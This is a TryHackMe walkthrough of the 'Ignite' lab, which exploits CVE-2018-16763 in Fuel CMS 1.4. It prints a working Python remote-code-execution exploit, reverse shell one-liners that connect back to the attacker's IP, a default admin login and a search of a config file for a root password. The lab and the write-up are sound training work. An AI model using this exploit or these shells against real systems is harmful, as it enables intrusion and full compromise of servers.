Ignite — TryHackMe Walkthrough

Ignite

Hello! Today I’ll be solving ‘Ignite’ on TryHackMe.

This room is vulnerable to CVE-2018–16763, RCE vulnerability which is found in Fuel CMS version 1.4.

Room Link: https://tryhackme.com/room/ignite

TryHackMe | Ignite

Lets get started!

Right off the bat, I’ll add my target’s IP address to /etc/hosts

/etc/hosts

Step 0: Reconnaissance

To get started, I’ll enumerate the target host for open ports using Nmap(Network Mapper).

sudo nmap -T4 --min-rate=10000 -p- -A ignite.thm -oN logs/initial_nmap

1. -T4 — spend maximum 4 seconds scanning a single port.
2. — min-rate=10000 — sends 10000 packet per second
3. -p- — scans all ports
4. -A — enables aggressive scanning
5. -oN — saves output in normal format

nmap scan

Got only one open port(quite strange) which is 80/tcp — HTTP — running Apache web server with Fuel CMS.

The robots.txt one disallowed entry i.e. /fuel which is the login page for the CMS

Step 1: Web Exploitation

Lets visit the website running on port 80.

home page

Its the default Fuel CMS page, lets try to login to the CMS dashboard

login panel

We’ll first try the default username and password admin:admin

cms dashboard

And we get the access of the dashboard. Lets navigate to the pages tab and upload a php reverse shell.

pages upload

The server isn’t setup for file uploads, gotta find a way around.

Back on the homepage we get the version of Fuel CMS that is currently running(version 1.4 in this case).

Lets check for exploits of this version if any.

searchsploit

Found a few exploits, we’ll use the first one which exploits RCE vulnerability, CVE-2018–16763.

OffSec's Exploit Database Archive

The python code for the exploit had some errors, so I had to fix it manually.

Original Exploit

# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
 xxxx = raw_input('cmd:')
 burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
 proxy = {"http":"http://127.0.0.1:8080"}
 r = requests.get(burp0_url, proxies=proxy)

 html = "<!DOCTYPE html>"
 htmlcharset = r.text.find(html)

 begin = r.text[0:20]
 dup = find_nth_overlapping(r.text,begin,2)

 print r.text[0:dup]

Fixed exploit

# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "http://ignite.thm"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
 xxxx = input('cmd:')
 burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(xxxx)+"%27%29%2b%27"
 #proxy = {"http":"http://127.0.0.1:8080"}
 r = requests.get(burp0_url)

 html = "<!DOCTYPE html>"
 htmlcharset = r.text.find(html)

 begin = r.text[0:20]
 dup = find_nth_overlapping(r.text,begin,2)

 print(r.text[0:dup])

RCE attack

We get a little shell to exploit the RCE vulnerability. Lets start a netcat listener and get a reverse shell.

nc -nlvp 1234

I tried to get a reverse shell using the traditional way:

bash -i >& /dev/tcp/10.17.101.143/1234 0>&1

But it didn’t work, so after referring to PentestMonkey’s reverse shell cheat sheet I finally got the shell using the netcat payload

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.101.143 1234 >/tmp/f

Reverse Shell Cheat Sheet

As you can see we don’t get a response from the web server and the shell just hanged after executing the command.

This is because we got a reverse shell on our netcat listener.

Step 2: Compromising the system

reverse shell

We have the reverse shell of our target host but its not quite friendly at the moment. So let’s stabilise it.

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

<CTRL> + Z

stty raw -echo; fg

And now we have a stable shell with tab autocomplete and other features.

Lets search for the first flag.

find / -type f -name *.txt | grep "flag"

user flag

Easy catch!

Step 3: Privilege Escalation

We can’t use sudo -l to check for the commands available to execute as root by the current user since we don’t have the sudo password.

So lets check inside the web app’s config files for any leaked credential.

On the default page of Fuel CMS, it is specified to include the username and password inside database.php, so lets read the database.php and grep for the keyword “pass”.

cat database.php | grep "pass" -A 5 -B 5

1. -A 5 — print 5 lines after the keyword “pass”
2. -B 5 — print 5 lines before the keyword “pass”

database.php

Caught the password for root user. Lets switch and grab the root flag

rooted shell

Pwned!

Conclusion

Ignite is an easy-rated room on TryHackMe, to pwn this box I exploited the RCE vulnerability, CVE-2018–16763, which existed in version 1.4 of Fuel CMS. For privilege escalation, I used the leaked credentials inside of database.php file and successfully rooted this room!

References

1. https://www.exploit-db.com/exploits/47138
2. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
3. https://www.codeigniter.com/user_guide/database/configuration.html

Happy Hacking!